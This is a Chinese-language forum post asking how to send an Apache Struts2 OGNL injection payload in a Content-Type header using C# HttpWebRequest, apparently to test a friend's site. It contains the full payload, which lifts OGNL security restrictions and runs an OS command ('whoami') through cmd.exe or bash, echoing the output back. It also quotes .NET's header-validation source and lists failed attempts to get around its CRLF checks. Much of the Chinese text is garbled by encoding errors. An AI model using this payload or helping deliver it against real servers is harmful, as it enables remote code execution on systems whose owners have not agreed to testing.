各位大佬好--����!
應(yīng)朋友要求���,幫他測試一個(gè)web漏洞。
本來以為很簡單的一個(gè)HTTP GET���,寫完跑起來之后����,發(fā)現(xiàn)無論如何都達(dá)不到想要的效果
HttpWebRequest
url =xxx,
method =get,
content-type="%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new (here is new line) java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}",
KeepAlive =false,
OverTime = 8000 (ms)
跑起來之后發(fā)現(xiàn)給header.content-type賦值的時(shí)候報(bào)錯(cuò)CRLF�����,問題出自字符串中“P=new Java”這里的空格和換行
查看堆棧到官方看從元數(shù)據(jù)發(fā)現(xiàn)有個(gè)限制就是串里面不能出現(xiàn)空格或者換行:https://referencesource.micro...
internal static string CheckBadChars(string name, bool isHeaderValue) {
if (name == null || name.Length == 0) {
// emtpy name is invlaid
if (!isHeaderValue) {
throw name == null ? new ArgumentNullException("name") :
new ArgumentException(SR.GetString(SR.net_emptystringcall, "name"), "name");
}
//empty value is OK
return string.Empty;
}
if (isHeaderValue) {
// VALUE check
//Trim spaces from both ends
name = name.Trim(HttpTrimCharacters);
//First, check for correctly formed multi-line value
//Second, check for absenece of CTL characters
int crlf = 0;
for(int i = 0; i < name.Length; ++i) {
char c = (char) (0x000000ff & (uint) name[i]);
switch (crlf)
{
case 0:
if (c == '\r')
{
crlf = 1;
}
else if (c == '\n')
{
// Technically this is bad HTTP. But it would be a breaking change to throw here.
// Is there an exploit?
crlf = 2;
}
else if (c == 127 || (c < ' ' && c != '\t'))
{
throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidControlChars), "value");
}
break;
case 1:
if (c == '\n')
{
crlf = 2;
break;
}
throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidCRLFChars), "value");
case 2:
if (c == ' ' || c == '\t')
{
crlf = 0;
break;
}
throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidCRLFChars), "value");
}
}
if (crlf != 0)
{
throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidCRLFChars), "value");
}
}
else {
// NAME check
//First, check for absence of separators and spaces
if (name.IndexOfAny(ValidationHelper.InvalidParamChars) != -1) {
throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidHeaderChars), "name");
}
//Second, check for non CTL ASCII-7 characters (32-126)
if (ContainsNonAsciiChars(name)) {
throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidNonAsciiChars), "name");
}
}
return name;
}
求助各位大佬�,因?yàn)榕笥延肞ython和java都已實(shí)現(xiàn)一樣的GET--!
試過以下方法
rn 報(bào)錯(cuò)CRLF
字符串拼接 不生效
u0008 報(bào)錯(cuò)CRLF
\n 不生效
麻煩各位幫幫忙����,給點(diǎn)建議或者意見�,萬分感謝���。
